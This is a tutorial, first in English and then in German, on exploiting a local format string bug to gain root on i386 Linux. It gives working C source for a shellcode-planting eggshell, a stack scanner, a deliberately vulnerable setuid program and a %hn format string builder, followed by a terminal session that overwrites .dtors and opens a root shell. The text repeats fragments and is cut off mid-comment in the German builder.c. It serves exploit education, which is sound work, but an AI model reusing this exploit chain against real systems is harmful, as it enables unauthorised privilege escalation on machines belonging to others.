How to write Format String Exploits    


How to write Format String Exploits,
also a summary, in child-friendly pieces, of the texts at http://community.core-sdi.com/~juliano/
by Delikon (ich@delikon.de / www.delikon.de.vu / 27.4.02)

None of the following code is originally mine; I have rewritten it a little so that it works with this example and with any local format string bug.

I will now present each piece of source code; you can also download it from www.delikon.de.vu
in the security section.

1. The eggshell. This code is used to place the shellcode in memory: it puts a NOP sled plus the shellcode into an environment variable and starts a shell that inherits it. It is from
"Format String Attack on alpha system", slightly rewritten.

-----------------egg.c--------------------------

/*
* this shall set egg shell in our environment
* ./egg <size> <align>
* truefinder, seo@igrus.inha.ac.kr
*
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

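#define DEF_EGGSIZE 4096   /* default size of the environment buffer that holds the egg */
#define DEF_ALIGN 5        /* base number of trailing 'A' padding bytes */

/*
 * One NOP (0x90) as a proper C string.  The original `{ 0x90 }` had no
 * terminating NUL, so every strcat() of it read past the end of the array.
 */
char nop[] = "\x90";

/*
 * i386 Linux shellcode, 31 bytes, no NUL bytes (which is what lets
 * strlen()/strcat() handle it).  Decoded: setuid(0) via int 0x80, then
 * execve("//bin/sh", ...).
 */
static char shellcode[] =
"\x6a\x17\x58\x31\xdb\xcd\x80\x31"
"\xd2\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x8d\x42\x0b\xcd\x80";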



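/*
 * Build the egg ("S=" + NOP sled + shellcode + align * 'A') in a heap
 * buffer, export it with putenv() and start a shell that inherits it.
 *
 * ./egg <align> <size>
 *   argv[1]  added to DEF_ALIGN to give the number of trailing 'A' bytes
 *   argv[2]  buffer size (DEF_ALIGN is added to it), default DEF_EGGSIZE
 *
 * Fixes over the original: the egg is assembled with bounded memcpy/memset
 * instead of strcat() on an unterminated one-byte array, and a <size> too
 * small to hold the egg is rejected instead of overflowing the heap buffer.
 */
int
main( int argc, char *argv[] )
{
    char *eggbuf;
    int align, eggsize;
    size_t sc_len, needed, pos;
    const size_t nop_count = 250;   /* length of the NOP sled, as in the original */

    align = DEF_ALIGN;
    eggsize = DEF_EGGSIZE;

    if ( argc < 2 ) {
        printf ("%s <align> <size>\n", argv[0] );
        exit(0);
    }

    if ( argc > 1 )
        align = DEF_ALIGN + atoi(argv[1]);

    if ( argc > 2 )
        eggsize = atoi(argv[2]) + DEF_ALIGN ;

    if ( align < 0 ) {
        fprintf (stderr, "error : negative align\n");
        exit (-1);
    }

    /* sled + shellcode + padding + NUL must fit ("S=" overwrites two NOPs) */
    sc_len = strlen( shellcode );
    needed = nop_count + sc_len + (size_t)align + 1;
    if ( eggsize <= 0 || (size_t)eggsize < needed ) {
        fprintf (stderr, "error : size %d too small, need at least %lu\n",
                 eggsize, (unsigned long)needed);
        exit (-1);
    }

    if ( (eggbuf = malloc( eggsize )) == NULL ) {
        printf ("error : malloc \n");
        exit (-1);
    }
    memset( eggbuf, 0, eggsize );

    /* set egg buf: sled, shellcode, padding, terminator */
    memset( eggbuf, 0x90, nop_count );
    pos = nop_count;
    memcpy( eggbuf + pos, shellcode, sc_len );
    pos += sc_len;
    memset( eggbuf + pos, 'A', (size_t)align );
    pos += (size_t)align;
    eggbuf[pos] = '\0';

    /* variable name: the first two NOPs become "S=", exactly as before */
    memcpy ( eggbuf, "S=", 2 );

    /* eggbuf becomes part of environ from here on and must never be freed */
    if ( putenv ( eggbuf ) != 0 ) {
        perror ("putenv");
        exit (-1);
    }

    /* the new shell, and everything started from it, carries S= on its stack */
    system("/bin/sh");

    return 0;
}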

--------------------------end here----------------------------------------

2. With "find.c" you can find the location of the shellcode on the stack (from GOBBLES'
screen exploit).
You can also find the address with gdb:

a) gdb ./vuln
b) set args %s%s%s%s%s%s%s%s%s%s
c) run
d) gdb reports that vuln crashed (every %s dereferences a stack word as a pointer, so one of them faults)
e) x/2000 $ebp
f) search the dumped memory for the run of NOPs (0x90); any address inside that run will do.

-------------------------find.c-----------------------------------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*Thanks to GOBBLES for the code*/

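/*
 * Return the current stack pointer (i386 only: reads %esp).
 * The original relied on the value the asm left in %eax being used as the
 * return value, which the compiler does not guarantee (the function had no
 * return statement); an explicit output operand makes it well defined.
 */
unsigned long get_sp(void)
{
    unsigned int sp;
    __asm__ __volatile__ ("movl %%esp, %0" : "=r"(sp));
    return sp;
}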


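/* State shared with main(); kept global as in the original. */
int i=0;              /* result of the last strncmp(); 0 means the signature matched */
char *pointer;        /* scan cursor; main() starts it at the stack pointer */
/* twelve NOPs (0x90): the start of the sled that egg.c put into the environment */
const char *nops = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";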
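/*
 * Scan upward from the current stack pointer for the twelve-NOP signature
 * that egg.c placed in the environment and print where it is.
 *
 * The scan has no upper bound: if the egg is not in this process's
 * environment it runs past the top of the stack and dies with a
 * segmentation fault.  The printed address is a hint for vuln, whose stack
 * layout differs slightly (different argv); the long sled absorbs that.
 *
 * Fixes over the original: explicit `int main(void)` and integer returns
 * (the original returned nothing from an implicitly-int main), and the
 * pointer is cast before being printed with %lx.
 */
int main(void){
    size_t siglen = strlen(nops);

    fprintf(stderr, ". SUCHE!\n");
    pointer = (char *)get_sp();
    while((i = strncmp(pointer, nops, siglen)) != 0)
        pointer++;

    if(i == 0) {
        /* pointer+1 is still inside the sled, so it is a safe landing address */
        fprintf(stderr, "Shellcode ist bei ----> : 0x%lx\n", (unsigned long)(pointer+1));
        return 0;
    }
    /* not reachable: the loop above only ends on a match */
    fprintf(stderr, "Sorry nimm GDB\n");
    return 1;
}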

--------------------------end here------------------------------------------

3. This is the program with the bug; I have it from "What are format bugs ?"
by Christophe Blaess, Christophe Grenier and Frédéric Raynal, in my opinion the best tutorial.

--------------------------vuln.c------------------------------------------

/* vuln.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Both targets are defined after main(); vuln() prints their addresses. */
int helloWorld();
int accessForbidden();

/*
 * Intentionally vulnerable: `format` (argv[1]) is handed to snprintf() as
 * the format string with no arguments, so %x walks the caller's stack and
 * %n/%hn writes the character count to an attacker-chosen address.  Do not
 * "fix" this with "%s" -- the whole tutorial depends on the bug.  The frame
 * layout (buffer[128] followed by ptrf) is what the printed addresses show,
 * so the declaration and statement order is part of the demonstration.
 */
int vuln(const char *format)
{
char buffer[128];
int (*ptrf)();          /* printed before and after, so a write to it is visible */

memset(buffer, 0, sizeof(buffer));

printf("helloWorld() = %p\n", helloWorld);
printf("accessForbidden() = %p\n\n", accessForbidden);

ptrf = helloWorld;
printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

/* THE BUG: user-controlled format string, no arguments */
snprintf(buffer, sizeof buffer, format);
/* NOTE(review): strlen() returns size_t, %d is a type mismatch (harmless on i386; %zu is correct) */
printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));

printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);

return ptrf();
}

/* Print the address of every argv entry (a cheap stack probe) and pass argv[1] to vuln(). */
int main(int argc, char **argv) {
    if (argc <= 1) {
        fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
        exit(-1);
    }

    int idx = 0;
    while (idx < argc) {
        printf("%d %p\n", idx, argv[idx]);
        idx++;
    }

    exit(vuln(argv[1]));
}

/* Benign target of vuln(): announces itself on stdout and reports success. */
int helloWorld()
{
    fputs("Welcome in \"helloWorld\"\n", stdout);
    fflush(stdout);
    return 0;
}

/* Alternative target: vuln() never calls it unless ptrf has been overwritten. */
int accessForbidden()
{
    fputs("You shouldn't be here \"accesForbidden\"\n", stdout);
    fflush(stdout);
    return 0;
}

------------------------------end here-------------------------------

4. The last one is the format string builder "builder.c", also from "What are format bugs ?".
You can also do this by hand.

-----------------------------builder.c------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

/**
The 4 bytes where we have to write are placed that way : HH HH LL LL

The variables ending with "*h" refer to the high part of the word (H)
The variables ending with "*l" refer to the low part of the word (L)
*/
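/* True if any of the four bytes of `a` is 0x00: such a byte would end the
 * C string, so the address cannot be embedded in the format string. */
static int has_nul_byte(unsigned int a)
{
    int k;
    for (k = 0; k < 4; k++) {
        if (((a >> (8 * k)) & 0xff) == 0)
            return 1;
    }
    return 0;
}

/* Store `a` low byte first at dst[0..3], the byte order the original's
 * "%c%c%c%c" with b3, b2, b1, b0 produced. */
static void put_le32(char *dst, unsigned int a)
{
    int k;
    for (k = 0; k < 4; k++)
        dst[k] = (char)((a >> (8 * k)) & 0xff);
}

/* Padding N for a "%.Nx" so that the victim's character counter, currently
 * `have` (mod 0x10000), reaches `want` (mod 0x10000).  Only the low 16 bits
 * are ever stored by %hn, so adding 0x10000 never changes the result; it is
 * added when N would be below 8 because "%.Nx" prints *at least* N
 * characters -- more if the popped 32-bit value has more than N hex digits,
 * and it can have up to 8.  With N >= 8 the count is exact. */
static unsigned int pad_for(unsigned int have, unsigned int want)
{
    unsigned int pad = (want + 0x10000u - (have & 0xffffu)) & 0xffffu;
    if (pad < 8)
        pad += 0x10000u;
    return pad;
}

/**
 * Build the format string that makes the victim write `value` into the
 * four bytes at `addr` using two %hn writes, given that the string itself
 * is reachable as printf argument number `where` ("%where$").
 *
 * Layout of the result (unchanged from the original):
 *   [addr+2][addr] "%.<pad1>x%<w1>$hn" "%.<pad2>x%<w2>$hn"
 * The first 8 bytes are the two target addresses (the high half-word's
 * address first), then one padded %x per half-word so the character
 * counter holds the wanted 16-bit value when each %hn fires.  Because the
 * counter only grows, the smaller half is written first.
 *
 * Returns a malloc()ed string the caller owns; exits on allocation failure,
 * on an address containing a NUL byte, or if the string does not fit.
 *
 * Fixes over the original: `%hd`/`%d` with unsigned arguments replaced by
 * `%u` (`%hd` converts to short, so precisions above 32767 would print as
 * negative numbers); addr+2 is computed on the whole word so a carry out of
 * the low byte is no longer lost; a half-word value below 8, or two equal
 * halves, no longer produces a wrapped or too-small precision.
 */
char* build(unsigned int addr, unsigned int value, unsigned int where) {

    unsigned int length = 128; //too lazy to evaluate the true length ...
    unsigned int valh;
    unsigned int vall;
    unsigned int first, second;   /* half-words written first / second */
    unsigned int w1, w2;          /* "%N$hn" argument numbers for them */
    unsigned int pad1, pad2;
    char *buf;
    int n;

    /* detailing the value */
    valh = (value >> 16) & 0xffff; //top
    vall = value & 0xffff; //bottom

    fprintf(stderr, "adr : %u (%x)\n", addr, addr);
    fprintf(stderr, "val : %u (%x)\n", value, value);
    fprintf(stderr, "valh: %u (%.4x)\n", valh, valh);
    fprintf(stderr, "vall: %u (%.4x)\n", vall, vall);

    /* a NUL byte in either target address would terminate the format string */
    if (has_nul_byte(addr) || has_nul_byte(addr + 2)) {
        fprintf(stderr, "Address %x contains a NUL byte, cannot embed it\n", addr);
        exit(EXIT_FAILURE);
    }

    /* buffer allocation */
    if ( ! (buf = malloc(length)) ) {
        fprintf(stderr, "Can't allocate buffer (%u)\n", length);
        exit(EXIT_FAILURE);
    }
    memset(buf, 0, length);

    /* the high half lives at addr+2 (argument `where`, the first address in
     * the string), the low half at addr (argument `where`+1) */
    if (valh < vall) {
        first = valh;  w1 = where;
        second = vall; w2 = where + 1;
    } else {
        first = vall;  w1 = where + 1;
        second = valh; w2 = where;
    }
    pad1 = pad_for(8, first);          /* the 8 address bytes are already counted */
    pad2 = pad_for(8 + pad1, second);

    /* let's build */
    put_le32(buf, addr + 2);           /* high address */
    put_le32(buf + 4, addr);           /* low address */

    n = snprintf(buf + 8, length - 8,
                 "%%.%ux"    /* set the value for the first %hn */
                 "%%%u$hn"   /* the first %hn */
                 "%%.%ux"    /* set the value for the second %hn */
                 "%%%u$hn",  /* the second %hn */
                 pad1, w1, pad2, w2);
    if (n < 0 || (unsigned int)n >= length - 8) {
        fprintf(stderr, "Format string does not fit in %u bytes\n", length);
        free(buf);
        exit(EXIT_FAILURE);
    }
    return buf;
}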

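/*
 * ./build <addr-hex> <value-hex> <offset>
 * Print the format string for writing <value> at <addr> on stdout (so it can
 * be used in backticks) and a readable copy plus its length on stderr.
 *
 * Fix over the original: it checked `argc < 3` and then read argv[3], so a
 * missing offset dereferenced a NULL pointer; three arguments are required.
 */
int
main(int argc, char **argv) {

    char *buf;

    if (argc < 4) {
        fprintf(stderr, "usage: %s <addr-hex> <value-hex> <offset>\n", argv[0]);
        return EXIT_FAILURE;
    }
    buf = build(strtoul(argv[1], NULL, 16),                 /* address */
                strtoul(argv[2], NULL, 16),                 /* value */
                (unsigned int)strtoul(argv[3], NULL, 10));  /* offset */

    fprintf(stderr, "[%s] (%lu)\n", buf, (unsigned long)strlen(buf));
    printf("%s", buf);
    free(buf);
    return EXIT_SUCCESS;
}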

------------------------------------end here------------------------------------


Now we get started.
(Compile it with gcc -o vuln vuln.c, and build the other programs the same way.)
Make it setuid root with

chown root.root vuln
chmod 4775 vuln

(Do this only on a disposable test machine. 4775 makes the setuid-root binary group-writable, as the -rwsrwxr-x in the listing below shows; 4755 is enough for the demonstration and does not let a member of the group replace the binary. Also note that a current system will not reproduce this walkthrough unchanged: ASLR moves the stack addresses, and the linker no longer emits a writable .dtors.)

exp@delikon:~/geht> ls -la
insgesamt 91
drwxr-xr-x 2 exp users 253 Apr 27 16:16 .
drwx------ 21 exp users 2240 Apr 27 16:32 ..
-rwxr-xr-x 1 exp users 15204 Apr 27 15:53 build
-rw-r--r-- 1 exp users 3804 Apr 26 19:25 build.c
-rw-r--r-- 1 exp users 36 Apr 26 19:26 chmod.txt
-rw-r--r-- 1 exp users 34 Apr 26 19:27 dtors.tct
-rwxr-xr-x 1 exp users 14756 Apr 27 15:42 egg
-rw-r--r-- 1 exp users 1377 Apr 26 19:25 egg.c
-rwxr-xr-x 1 exp users 14121 Apr 27 16:04 find
-rw-r--r-- 1 exp users 748 Apr 27
-rwsrwxr-x 1 root root 15028 Apr 27 15:54 vuln
-rw-r--r-- 1 exp users 1009 Apr 26 19:55 vuln.c

vuln is now setuid root.

2. start the eggshell (the shellcode is now in the environment of the new shell, and therefore on the stack of every program started from it).

exp@delikon:~/geht> ./egg 5 6000
sh-2.05$

You can use other values too; try it.

3. find the .dtors section of vuln (this is the memory location we want to overwrite)

sh-2.05$ objdump -s -j .dtors vuln

vuln: file format elf32-i386

Contents of section .dtors:
8049a64 ffffffff 00000000 ........
sh-2.05$

the location is 0x8049a64+4 = 0x8049a68 (always add 4: the first word, 0xffffffff, marks the start of the list, and the word after it is the first destructor pointer, which is called at exit; see "Overwriting the .dtors section"). This only works with a toolchain that still emits a writable .dtors; current linkers use .fini_array and RELRO maps it read-only.

4. The third and last argument is the offset; every box has a different one.
I search for it manually:

sh-2.05$ ./vuln AAAA%6\$x

0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA4000b07e] (12)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"


sh-2.05$ ./vuln AAAA%7\$x

0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA8048780] (11)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"

sh-2.05$ ./vuln AAAA%8\$x

0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA41414141] (12) <--------- we find it!!! because A is 41 in hex.
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"

You see the offset is 8.
P.S. on your machine you may have to start at 1 rather than at 6 as I did.


5. Now we need the value to write into 0x8049a68:
the address of the shellcode.

sh-2.05$ ./find
. SUCHE!
Shellcode ist bei ----> : 0xbffffbae

6. We are ready! We have our three arguments: the "where" (0x8049a68), the "what" (0xbffffbae)
and the "offset" (8).

Let's check the user one last time:

sh-2.05$ whoami
exp

Now we start the exploit (the builder output goes in backticks so it becomes argv[1] of vuln):

sh-2.05$ ./vuln `./build 0x8049a68 0xbffffbae 8`

adr : 134519400 (8049a68)
val : -1073742930 (bffffbae)
valh: 49151 (bfff)
vall: 64430 (fbae)
[jh%.49143x%8$hn%.15279x%9$hn] (34)
0 0xbffff676
1 0xbffff67d
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3bc)
buffer = [jh00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000] (127)
after : ptrf() = 0x8048780 (0xbffff3bc)
Welcome in "helloWorld"

sh-2.05# whoami
root <--------------- now we are root!!!!!!


P.S. every value in this tutorial differs from machine to machine! If you have questions, mail me at ich@delikon.de
or visit www.delikon.de.vu

= 0x8048780 (0xbffff3bc)
buffer = [jh00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000] (127)
after : ptrf() = 0x8048780 (0xbffff3bc)
Welcome in "helloWorld"

sh-2.05# whoami
root <--------------- Sieg des Menschen über die Maschine


P.S. bei euch sind alle Werte anders, es muss aber trozdem gehen wenn nicht, mailt mir ich@delikon.de
oder besucht mich unter www.delikon.de.vu


Wie schreibt man Format String Exploits    


Wie schreibt man Format String Exploits,
oder auch eine Zusammenfassung der Texte von http://community.core-sdi.com/~juliano/ in kindgerechten Happen.
von Delikon (ich@delikon.de/www.delikon.de.vu/27.4.02)

Keiner der folgenden Codes stammt von mir; ich habe sie nur ein wenig umgeschrieben, damit sie bei diesem Beispiel
und bei jedem beliebigen lokalen Format-String-Bug funktionieren.

Ich werde nun alle Quellcodes ein mal vorstellen.
Auch unter www.delikon.de.vu in der Securitysection zum downloaden.


1. Die Eggshell. Sie wird verwendet, um den Shellcode in den Speicher zu bringen: NOP-Sled und Shellcode landen in einer Umgebungsvariablen einer neu gestarteten Shell. Dieser Code ist von
"Format String Attack on alpha system", nur eben auf ix86 portiert und mit dem Shellcode aus dem ptrace24.c-Exploit.

-----------------egg.c--------------------------

/*
* this shall set egg shell in our environment
* ./egg <size> <align>
* truefinder, seo@igrus.inha.ac.kr
*
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

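#define DEF_EGGSIZE 4096   /* default size of the environment buffer that holds the egg */
#define DEF_ALIGN 5        /* base number of trailing 'A' padding bytes */

/*
 * One NOP (0x90) as a proper C string.  The original `{ 0x90 }` had no
 * terminating NUL, so every strcat() of it read past the end of the array.
 */
char nop[] = "\x90";

/*
 * i386 Linux shellcode, 31 bytes, no NUL bytes (which is what lets
 * strlen()/strcat() handle it).  Decoded: setuid(0) via int 0x80, then
 * execve("//bin/sh", ...).
 */
static char shellcode[] =
"\x6a\x17\x58\x31\xdb\xcd\x80\x31"
"\xd2\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x8d\x42\x0b\xcd\x80";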



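/*
 * Build the egg ("S=" + NOP sled + shellcode + align * 'A') in a heap
 * buffer, export it with putenv() and start a shell that inherits it.
 *
 * ./egg <align> <size>
 *   argv[1]  added to DEF_ALIGN to give the number of trailing 'A' bytes
 *   argv[2]  buffer size (DEF_ALIGN is added to it), default DEF_EGGSIZE
 *
 * Fixes over the original: the egg is assembled with bounded memcpy/memset
 * instead of strcat() on an unterminated one-byte array, and a <size> too
 * small to hold the egg is rejected instead of overflowing the heap buffer.
 */
int
main( int argc, char *argv[] )
{
    char *eggbuf;
    int align, eggsize;
    size_t sc_len, needed, pos;
    const size_t nop_count = 250;   /* length of the NOP sled, as in the original */

    align = DEF_ALIGN;
    eggsize = DEF_EGGSIZE;

    if ( argc < 2 ) {
        printf ("%s <align> <size>\n", argv[0] );
        exit(0);
    }

    if ( argc > 1 )
        align = DEF_ALIGN + atoi(argv[1]);

    if ( argc > 2 )
        eggsize = atoi(argv[2]) + DEF_ALIGN ;

    if ( align < 0 ) {
        fprintf (stderr, "error : negative align\n");
        exit (-1);
    }

    /* sled + shellcode + padding + NUL must fit ("S=" overwrites two NOPs) */
    sc_len = strlen( shellcode );
    needed = nop_count + sc_len + (size_t)align + 1;
    if ( eggsize <= 0 || (size_t)eggsize < needed ) {
        fprintf (stderr, "error : size %d too small, need at least %lu\n",
                 eggsize, (unsigned long)needed);
        exit (-1);
    }

    if ( (eggbuf = malloc( eggsize )) == NULL ) {
        printf ("error : malloc \n");
        exit (-1);
    }
    memset( eggbuf, 0, eggsize );

    /* set egg buf: sled, shellcode, padding, terminator */
    memset( eggbuf, 0x90, nop_count );
    pos = nop_count;
    memcpy( eggbuf + pos, shellcode, sc_len );
    pos += sc_len;
    memset( eggbuf + pos, 'A', (size_t)align );
    pos += (size_t)align;
    eggbuf[pos] = '\0';

    /* variable name: the first two NOPs become "S=", exactly as before */
    memcpy ( eggbuf, "S=", 2 );

    /* eggbuf becomes part of environ from here on and must never be freed */
    if ( putenv ( eggbuf ) != 0 ) {
        perror ("putenv");
        exit (-1);
    }

    /* the new shell, and everything started from it, carries S= on its stack */
    system("/bin/sh");

    return 0;
}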

--------------------------end here----------------------------------------

2. Mit "find.c" findest du die Speicheradresse des Shellcodes im Stack (aus GOBBLES' screen-Exploit).
Man findet die Adresse aber auch mit gdb:
a) gdb ./vuln
b) set args %s%s%s%s%s%s%s%s%s%s
c) run
d) gdb meldet, dass das Programm abgestürzt ist (jedes %s dereferenziert ein Stack-Wort als Zeiger, eines davon knallt)
e) x/2000 $ebp
f) such im Speicherauszug eine Stelle mit den NOPs (0x90); jede Adresse innerhalb des Sleds reicht

-------------------------find.c-----------------------------------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*Thanks to GOBBLES for the code*/

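/*
 * Return the current stack pointer (i386 only: reads %esp).
 * The original relied on the value the asm left in %eax being used as the
 * return value, which the compiler does not guarantee (the function had no
 * return statement); an explicit output operand makes it well defined.
 */
unsigned long get_sp(void)
{
    unsigned int sp;
    __asm__ __volatile__ ("movl %%esp, %0" : "=r"(sp));
    return sp;
}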


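/* State shared with main(); kept global as in the original. */
int i=0;              /* result of the last strncmp(); 0 means the signature matched */
char *pointer;        /* scan cursor; main() starts it at the stack pointer */
/* twelve NOPs (0x90): the start of the sled that egg.c put into the environment */
const char *nops = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";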
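/*
 * Scan upward from the current stack pointer for the twelve-NOP signature
 * that egg.c placed in the environment and print where it is.
 *
 * The scan has no upper bound: if the egg is not in this process's
 * environment it runs past the top of the stack and dies with a
 * segmentation fault.  The printed address is a hint for vuln, whose stack
 * layout differs slightly (different argv); the long sled absorbs that.
 *
 * Fixes over the original: explicit `int main(void)` and integer returns
 * (the original returned nothing from an implicitly-int main), and the
 * pointer is cast before being printed with %lx.
 */
int main(void){
    size_t siglen = strlen(nops);

    fprintf(stderr, ". SUCHE!\n");
    pointer = (char *)get_sp();
    while((i = strncmp(pointer, nops, siglen)) != 0)
        pointer++;

    if(i == 0) {
        /* pointer+1 is still inside the sled, so it is a safe landing address */
        fprintf(stderr, "Shellcode ist bei ----> : 0x%lx\n", (unsigned long)(pointer+1));
        return 0;
    }
    /* not reachable: the loop above only ends on a match */
    fprintf(stderr, "Sorry nimm GDB\n");
    return 1;
}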

--------------------------end here------------------------------------------

3. Das Programm mit dem Bug habe ich aus "What are format bugs ?"
von Christophe Blaess, Christophe Grenier und Frédéric Raynal, meiner Meinung nach das beste Tutorial.


--------------------------vuln.c------------------------------------------

/* vuln.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Both targets are defined after main(); vuln() prints their addresses. */
int helloWorld();
int accessForbidden();

/*
 * Intentionally vulnerable: `format` (argv[1]) is handed to snprintf() as
 * the format string with no arguments, so %x walks the caller's stack and
 * %n/%hn writes the character count to an attacker-chosen address.  Do not
 * "fix" this with "%s" -- the whole tutorial depends on the bug.  The frame
 * layout (buffer[128] followed by ptrf) is what the printed addresses show,
 * so the declaration and statement order is part of the demonstration.
 */
int vuln(const char *format)
{
char buffer[128];
int (*ptrf)();          /* printed before and after, so a write to it is visible */

memset(buffer, 0, sizeof(buffer));

printf("helloWorld() = %p\n", helloWorld);
printf("accessForbidden() = %p\n\n", accessForbidden);

ptrf = helloWorld;
printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

/* THE BUG: user-controlled format string, no arguments */
snprintf(buffer, sizeof buffer, format);
/* NOTE(review): strlen() returns size_t, %d is a type mismatch (harmless on i386; %zu is correct) */
printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));

printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);

return ptrf();
}

/* Print the address of every argv entry (a cheap stack probe) and pass argv[1] to vuln(). */
int main(int argc, char **argv) {
    if (argc <= 1) {
        fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
        exit(-1);
    }

    int idx = 0;
    while (idx < argc) {
        printf("%d %p\n", idx, argv[idx]);
        idx++;
    }

    exit(vuln(argv[1]));
}

/* Benign target of vuln(): announces itself on stdout and reports success. */
int helloWorld()
{
    fputs("Welcome in \"helloWorld\"\n", stdout);
    fflush(stdout);
    return 0;
}

/* Alternative target: vuln() never calls it unless ptrf has been overwritten. */
int accessForbidden()
{
    fputs("You shouldn't be here \"accesForbidden\"\n", stdout);
    fflush(stdout);
    return 0;
}

------------------------------end here-------------------------------

4. Und als Letztes der Format-String-Builder "builder.c", ebenfalls aus "What are format bugs ?".
Geht auch alles per Hand :=), ist dann aber nicht mehr kindgerecht ;).

-----------------------------builder.c------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

/**
The 4 bytes where we have to write are placed that way : HH HH LL LL

The variables ending with "*h" refer to the high part of the word (H)
The variables ending with "*l" refer to the low part of the word (L)
*/
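/* True if any of the four bytes of `a` is 0x00: such a byte would end the
 * C string, so the address cannot be embedded in the format string. */
static int has_nul_byte(unsigned int a)
{
    int k;
    for (k = 0; k < 4; k++) {
        if (((a >> (8 * k)) & 0xff) == 0)
            return 1;
    }
    return 0;
}

/* Store `a` low byte first at dst[0..3], the byte order the original's
 * "%c%c%c%c" with b3, b2, b1, b0 produced. */
static void put_le32(char *dst, unsigned int a)
{
    int k;
    for (k = 0; k < 4; k++)
        dst[k] = (char)((a >> (8 * k)) & 0xff);
}

/* Padding N for a "%.Nx" so that the victim's character counter, currently
 * `have` (mod 0x10000), reaches `want` (mod 0x10000).  Only the low 16 bits
 * are ever stored by %hn, so adding 0x10000 never changes the result; it is
 * added when N would be below 8 because "%.Nx" prints *at least* N
 * characters -- more if the popped 32-bit value has more than N hex digits,
 * and it can have up to 8.  With N >= 8 the count is exact. */
static unsigned int pad_for(unsigned int have, unsigned int want)
{
    unsigned int pad = (want + 0x10000u - (have & 0xffffu)) & 0xffffu;
    if (pad < 8)
        pad += 0x10000u;
    return pad;
}

/**
 * Build the format string that makes the victim write `value` into the
 * four bytes at `addr` using two %hn writes, given that the string itself
 * is reachable as printf argument number `where` ("%where$").
 *
 * Layout of the result (unchanged from the original):
 *   [addr+2][addr] "%.<pad1>x%<w1>$hn" "%.<pad2>x%<w2>$hn"
 * The first 8 bytes are the two target addresses (the high half-word's
 * address first), then one padded %x per half-word so the character
 * counter holds the wanted 16-bit value when each %hn fires.  Because the
 * counter only grows, the smaller half is written first.
 *
 * Returns a malloc()ed string the caller owns; exits on allocation failure,
 * on an address containing a NUL byte, or if the string does not fit.
 *
 * Fixes over the original: `%hd`/`%d` with unsigned arguments replaced by
 * `%u` (`%hd` converts to short, so precisions above 32767 would print as
 * negative numbers); addr+2 is computed on the whole word so a carry out of
 * the low byte is no longer lost; a half-word value below 8, or two equal
 * halves, no longer produces a wrapped or too-small precision.
 */
char* build(unsigned int addr, unsigned int value, unsigned int where) {

    unsigned int length = 128; //too lazy to evaluate the true length ...
    unsigned int valh;
    unsigned int vall;
    unsigned int first, second;   /* half-words written first / second */
    unsigned int w1, w2;          /* "%N$hn" argument numbers for them */
    unsigned int pad1, pad2;
    char *buf;
    int n;

    /* detailing the value */
    valh = (value >> 16) & 0xffff; //top
    vall = value & 0xffff; //bottom

    fprintf(stderr, "adr : %u (%x)\n", addr, addr);
    fprintf(stderr, "val : %u (%x)\n", value, value);
    fprintf(stderr, "valh: %u (%.4x)\n", valh, valh);
    fprintf(stderr, "vall: %u (%.4x)\n", vall, vall);

    /* a NUL byte in either target address would terminate the format string */
    if (has_nul_byte(addr) || has_nul_byte(addr + 2)) {
        fprintf(stderr, "Address %x contains a NUL byte, cannot embed it\n", addr);
        exit(EXIT_FAILURE);
    }

    /* buffer allocation */
    if ( ! (buf = malloc(length)) ) {
        fprintf(stderr, "Can't allocate buffer (%u)\n", length);
        exit(EXIT_FAILURE);
    }
    memset(buf, 0, length);

    /* the high half lives at addr+2 (argument `where`, the first address in
     * the string), the low half at addr (argument `where`+1) */
    if (valh < vall) {
        first = valh;  w1 = where;
        second = vall; w2 = where + 1;
    } else {
        first = vall;  w1 = where + 1;
        second = valh; w2 = where;
    }
    pad1 = pad_for(8, first);          /* the 8 address bytes are already counted */
    pad2 = pad_for(8 + pad1, second);

    /* let's build */
    put_le32(buf, addr + 2);           /* high address */
    put_le32(buf + 4, addr);           /* low address */

    n = snprintf(buf + 8, length - 8,
                 "%%.%ux"    /* set the value for the first %hn */
                 "%%%u$hn"   /* the first %hn */
                 "%%.%ux"    /* set the value for the second %hn */
                 "%%%u$hn",  /* the second %hn */
                 pad1, w1, pad2, w2);
    if (n < 0 || (unsigned int)n >= length - 8) {
        fprintf(stderr, "Format string does not fit in %u bytes\n", length);
        free(buf);
        exit(EXIT_FAILURE);
    }
    return buf;
}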

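/*
 * ./build <addr-hex> <value-hex> <offset>
 * Print the format string for writing <value> at <addr> on stdout (so it can
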